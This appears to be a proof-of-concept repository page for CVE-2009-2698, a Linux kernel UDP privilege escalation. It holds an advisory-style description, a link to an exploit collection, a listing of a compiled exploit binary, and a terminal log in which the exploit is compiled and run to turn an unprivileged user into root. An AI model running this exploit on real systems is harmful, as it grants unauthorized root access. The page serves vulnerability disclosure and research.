CVE-2009-2698 PoC — Linux kernel code issue vulnerability

Associated Vulnerability
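Title: Linux kernel code issue vulnerability (CVE-2009-2698)
Description: Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). NFSv4 implementation is one of its distributed file system protocols. A privilege escalation vulnerability exists in the udp_sendmsg function of the UDP implementation in net/ipv4/udp.c and net/ipv6/udp.c in Linux Kernel versions before 2.6.19. A local unprivileged user can gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and UDP sockets.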
Description
CVE-2009-2698 compiled for CentOS 4.8
Readme
# CVE-2009-2698
CVE-2009-2698 compiled for CentOS 4.8
> https://github.com/SecWiki/linux-kernel-exploits/tree/4dca098e7491efc83903494d7c00f24c843aae99/2009/CVE-2009-2698

# Detail

```
[hacker@localhost ~]$ id
uid=500(hacker) gid=500(hacker) groups=500(hacker) context=user_u:system_r:unconfined_t
[hacker@localhost ~]$ gcc 36108.c  -o exp
[hacker@localhost ~]$ ./exp
sh-3.00# id
uid=0(root) gid=0(root) groups=500(hacker) context=user_u:system_r:unconfined_t
sh-3.00# uname -an
Linux localhost.localdomain 2.6.9-89.EL #1 Mon Jun 22 12:19:40 EDT 2009 i686 i686 i386 GNU/Linux
sh-3.00# 
```
File Snapshot

```
[4.0K] /data/pocs/e819d5afa5bb29e18ae22a3016133bd25194fa5f
├── [6.8K] exp
└── [ 590] README.md

0 directories, 2 files
```